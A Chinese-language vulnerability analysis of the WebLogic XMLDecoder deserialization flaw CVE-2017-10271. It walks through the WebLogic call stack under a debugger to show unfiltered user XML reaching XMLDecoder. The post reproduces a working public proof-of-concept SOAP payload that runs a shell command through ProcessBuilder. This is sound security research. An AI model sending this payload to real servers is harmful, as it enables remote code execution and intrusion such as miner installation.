12月22号,绿盟科技博客发布一篇文章,里面有提及到weblogic由于存在0day漏洞,导致被植入恶意软件用来挖掘比特币。后来经过确认,这次***者所用的漏洞CVE编号为CVE-2017-10271,那么这个漏洞究竟是怎样造成的?

0. 分析环境

  • IDE:Intellij IDEA
  • 中间件版本: weblogic 10.3.6【未进行任何补丁修复】
  • 发包工具: brupsuite

1. 漏洞成因

我们先来看一下,网上公布的poc进行利用后的weblogic返回的响应,公布的利用poc如下:

<?xml version="1.0"?>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
    <soapenv:Header>
        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
            <java version="1.8.0_131" class="java.beans.XMLDecoder">
                <void class="java.lang.ProcessBuilder">
                    <array class="java.lang.String" length="3">
                        <void index="0">
                            <string>/bin/bash</string>
                        </void>
                        <void index="1">
                            <string>-c</string>
                        </void>
                        <void index="2">
                            <string>gedit</string>
                        </void>
                    </array>
                    <void method="start" />
                </void>
            </java>
        </work:WorkContext>
    </soapenv:Header>
    <soapenv:Body />
</soapenv:Envelope>

如下图所示,可以看到返回的是xml数据,而且可以清晰的看到调用栈,调用栈在<ns2:frame />标签中
WebLogic XMLDecoder反序列化漏洞(CVE-2017-10271)漏洞分析

仔细分析weblogic返回的响应,我们可以大概定位到问题点,我们重点关注<ns2:frame />标签中class以weblogic开头的部分,这部分就是weblogic处理我们请求的调用栈逻辑,weblogic处理完后就到了XMLDecoder
Step 1. 了解处理流程(为了方便查看,调用栈顺序为从上倒下)

  • weblogic.wsee.jaxws.workcontext.WorkContextServerTube->proce***equest
  • weblogic.wsee.jaxws.workcontext.WorkContextTube->readHeaderOld
  • weblogic.wsee.jaxws.workcontext.WorkContextServerTube->receive
  • weblogic.workarea.WorkContextMapImpl->receiveRequest
  • weblogic.workarea.WorkContextLocalMap->receiveRequest
  • weblogic.workarea.spi.WorkContextEntryImpl->readEntry
  • weblogic.wsee.workarea.WorkContextXmlInputAdapter->readUTF

Step 2.下断点调试
我们将断点设置在weblogic.wsee.jaxws.workcontext.WorkContextServerTube的proce***equest方法中readHeaderOld,如下图所示
WebLogic XMLDecoder反序列化漏洞(CVE-2017-10271)漏洞分析

Step 3.调试运行,跟踪

  1. proce***equest中,var1为我们POST的xml数据,类型为Packet;
    WebLogic XMLDecoder反序列化漏洞(CVE-2017-10271)漏洞分析

var3的值有是var2调用get方法后得来的,我们查看一下WorkAreaConstants.WORK_AREA_HEADER的内容,如下图所示
WebLogic XMLDecoder反序列化漏洞(CVE-2017-10271)漏洞分析

对比Poc内容与WorkAreaContants里面的XML_TAG、WORK_AREA_HEADER,我们不难联想到var2.get方法是用来获取work:WorkContext标签之间的内容。

2.readHeaderOld中,我们直接设置断点到weblogic调用栈最后一个函数WorkContextXmlInputAdapter,查看调用函数的参数值是什么?
WebLogic XMLDecoder反序列化漏洞(CVE-2017-10271)漏洞分析
可以看到,var4其实对应的是java标签内的代码
WebLogic XMLDecoder反序列化漏洞(CVE-2017-10271)漏洞分析

3.WorkContextXmlInputAdapter中,没有任何过滤就直接调用XMLDecoder方法,而XMLDecoder本身是用于将XML文件反序列成java的对象,因而造成的漏洞的发生。
WebLogic XMLDecoder反序列化漏洞(CVE-2017-10271)漏洞分析

归根结底,还是weblogic犯了编码上的错误,完全信任用户的输入,然后调用XMLDecoder进行反序列,导致了这个漏洞的发生。

参考链接

近期大量WebLogic主机感染挖矿病毒
Weblogic WLS组件漏洞技术分析与防护方案

Weblogic XMLDecoder RCE分析